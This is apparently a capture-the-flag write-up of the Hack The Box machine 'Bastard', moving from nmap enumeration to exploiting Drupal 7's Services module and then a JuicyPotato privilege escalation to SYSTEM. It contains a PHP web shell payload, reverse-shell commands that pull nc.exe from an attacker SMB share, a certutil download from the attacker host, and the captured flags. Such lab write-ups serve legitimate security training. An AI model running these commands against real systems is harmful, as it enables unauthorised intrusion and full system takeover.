Bastard

Enumeration
As usual, we start with an nmap scan, in order to find open ports in the target machine.
The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:
nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.9 -oN allPorts
-sS
use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.--min-rate 5000
nmap will try to keep the sending rate at or above 5000 packets per second.-p-
scanning the entire port range, from 1 to 65535.-T5
insane mode, it is the fastest mode of the nmap time template.-Pn
assume the host is online.-n
scan without reverse DNS resolution.-oN
save the scan result into a file, in this case the allports file.
# Nmap 7.92 scan initiated Mon Mar 7 14:42:44 2022 as: nmap -sS -p- -T5 --min-rate 5000 -n -Pn -oN allPorts 10.10.10.9
Nmap scan report for 10.10.10.9
Host is up (0.058s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
49154/tcp open unknown
# Nmap done at Mon Mar 7 14:43:10 2022 -- 1 IP address (1 host up) scanned in 26.74 seconds
As we see, ports 80, 135 and 49154 are open. Let's try to obtain more information about the services and versions running on those ports.
nmap -sC -sV -p80,135,49154 10.10.10.9 -oN targeted
-sC
performs the scan using the default set of scripts.-sV
enables version detection.-oN
save the scan result into file, in this case the targeted file.
# Nmap 7.92 scan initiated Mon Mar 7 14:45:20 2022 as: nmap -sCV -p80,135,49154 -oN targeted 10.10.10.9
Nmap scan report for 10.10.10.9
Host is up (0.038s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Welcome to 10.10.10.9 | 10.10.10.9
|_http-generator: Drupal 7 (http://drupal.org)
|_http-server-header: Microsoft-IIS/7.5
135/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Mar 7 14:46:25 2022 -- 1 IP address (1 host up) scanned in 65.35 seconds
Exploitation
On port 80 we have a Drupal 7. Let's look for any common exploit for that version of Drupal.
searchsploit Drupal 7.X
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Drupal 7.x Module Services - Remote Code Execution | php/webapps/41564.php
Drupal < 7.34 - Denial of Service | php/dos/35415.txt
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code (Metasploit) | php/webapps/44557.rb
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code Execution (PoC) | php/webapps/44542.txt
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution | php/webapps/44449.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Metasploit) | php/remote/44482.rb
Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (PoC) | php/webapps/44448.py
Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) | php/remote/46510.rb
Drupal < 8.6.10 / < 8.5.11 - REST Module Remote Code Execution | php/webapps/46452.txt
Drupal < 8.6.9 - REST Module Remote Code Execution | php/webapps/46459.py
Drupal avatar_uploader v7.x-1.0-beta8 - Arbitrary File Disclosure | php/webapps/44501.txt
Drupal Module CKEditor < 4.1WYSIWYG (Drupal 6.x/7.x) - Persistent Cross-Site Scripting | php/webapps/25493.txt
Drupal Module Coder < 7.x-1.3/7.x-2.6 - Remote Code Execution | php/remote/40144.php
Drupal Module RESTWS 7.x - PHP Remote Code Execution (Metasploit) | php/remote/40130.rb
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Let's move the first exploit to our current folder.
searchsploit -m php/webapps/41564.php
-m
copies an exploit to the current working directory.
Exploit: Drupal 7.x Module Services - Remote Code Execution
URL: https://www.exploit-db.com/exploits/41564
Path: /usr/share/exploitdb/exploits/php/webapps/41564.php
File Type: C++ source, ASCII text
Copied to: /home/alfa8sa/HTB/machines/bastard/41564.php
Before executing it, we will have to change a few things.
nano 41564.php
First, let's change the $url
variable with the URL of the Bastard machine.
$url = 'http://10.10.10.9';
Then we'll have to verify if the $endpoint_path
exits. If we search for http://10.10.10.9/rest_endpoint
we'll get an error saying that the requested page doesn't exist.

But don't worry, if you search for the http://10.10.10.9/rest
directory we will get a message.

So on the PHP script we'll have to change the $endpoint_path
variable to /rest
.
$endpoint_path = '/rest';
Finally, we'll have to modify the $file
variable, by changing the filename and the data fields. At the data field we'll put some PHP code that will execute at a system level whatever we pass through the cmd
parameter.
$file = [
'filename' => 'rce.php',
'data' => '<?php echo "<pre>" . shell_exec($_REQUEST[\'cmd\']) . "</pre>";?>'
];
Finally, we could run the script.
php 41564.php
# Exploit Title: Drupal 7.x Services Module Remote Code Execution
# Vendor Homepage: https://www.drupal.org/project/services
# Exploit Author: Charles FOL
# Contact: https://twitter.com/ambionics
# Website: https://www.ambionics.io/blog/drupal-services-module-rce
#!/usr/bin/php
Stored session information in session.json
Stored user information in user.json
Cache contains 7 entries
File written: http://10.10.10.9/rce.php
Now we could access http://10.10.10.9/rce.php
and execute commands with the ?cmd
parameter.
curl http://10.10.10.9/rce.php?cmd=whoami
<pre>nt authority\iusr
</pre>
Time to get a shell. First, let's set a netcat listener on port 4444.
nc -lvnp 4444
-l
listen mode.-v
verbose mode.-n
numeric-only IP, no DNS resolution.-p
specify the port to listen on.
Then you'll have to download nc.exe and set an SMB server with the impacket-smbserver tool in the directory where the binary is located.
impacket-smbserver smbFolder $(pwd) -smb2support
Finally, if we access the previous URL indicating the nc.exe binary located in the shared folder, we could send us back a reverse as the nt authority\iusr
user, and we could grab the user flag.
http://10.10.10.9/rce.php?cmd=\\10.10.14.11\smbFolder\nc.exe -e cmd 10.10.14.11 4444
listening on [any] 4444 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.9] 49422
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\inetpub\drupal-7.54>whoami
whoami
nt authority\iusr
C:\inetpub\drupal-7.54>type \users\dimitris\desktop\user.txt
type \users\dimitris\desktop\user.txt
9026b4905694e46ffc32a38fa2571407
Privilege Escalation
Let's see what privileges the user nt authority\iusr
has.
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
======================= ========================================= =======
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
If a user has the SeImpersonatePrivilege, the first thing that comes to mind is JuicyPotato.
To escalate privileges, we'll have to transfer JuicyPotato.exe
to the victim machine. Let's set a python HTTP server on the directory where we have the JuicyPotato binary.
python -m SimpleHTTPServer
And download the binaries from the desktop folder of the nt authority\iusr
user.
certutil.exe -f -urlcache -split http://10.10.14.11:8000/JuicyPotato.exe JuicyPotato.exe
Before executing the JuicyPotato.exe
binary, let's set another netcat listener on port 5555 to catch a reverse shell as the NT AUTHORITY\SYSTEM
user.
nc -lvnp 5555
-l
listen mode.-v
verbose mode.-n
numeric-only IP, no DNS resolution.-p
specify the port to listen on.
And let's set an SMB server on the directory where the nc.exe
binary is located.
impacket-smbserver smbFolder $(pwd) -smb2support
Finally, let's run the JuicyPotato binary to get a shell as the NT AUTHORITY\SYSTEM
user.
JuicyPotato.exe -t * -l 1337 -p C:\Windows\System32\cmd.exe -a "/c \\10.10.14.11\smbFolder\nc.exe -e cmd 10.10.14.11 5555"
-t
createprocess call.-l
COM server listen port.-p
program to launch.-a
specify command arguments.
Testing {4991d34b-80a1-4291-83b6-3328366b9097} 1337
COM -> recv failed with error: 10038
But we get an error. This is happening because JuicyPotato is using the default CLSID. If check for system information, we'll see the machine is a Microsoft Windows Server 2008 R2 Datacenter
.
systeminfo
Host Name: BASTARD
OS Name: Microsoft Windows Server 2008 R2 Datacenter
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 55041-402-3582622-84461
Original Install Date: 18/3/2017, 7:04:46 ��
System Boot Time: 7/3/2022, 3:48:18 ��
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
[01]: AMD64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
[02]: AMD64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: el;Greek
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory: 2.047 MB
Available Physical Memory: 1.585 MB
Virtual Memory: Max Size: 4.095 MB
Virtual Memory: Available: 3.606 MB
Virtual Memory: In Use: 489 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.9
So we have to change the CLSID to a valid one. You can check a Windows 8 CLSID list here.
If we change it for {9B1F122C-2982-4e91-AA8B-E071D54F2A4D}
, we should get the reverse shell. Then all we have to do is reap the harvest and take the root flag.
JuicyPotato.exe -t * -l 1337 -p C:\Windows\System32\cmd.exe -a "/c \\10.10.14.11\smbFolder\nc.exe -e cmd 10.10.14.11 5555" -c "{9B1F122C-2982-4e91-AA8B-E071D54F2A4D}"
-t
createprocess call.-l
COM server listen port.-p
program to launch.-a
specify command arguments.-c
use CLSID.
listening on [any] 5555 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.9] 49455
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>type \users\administrator\desktop\root.txt
type \users\administrator\desktop\root.txt
1d20b21916f1064ba7b0232d6725edeb
Last updated
Was this helpful?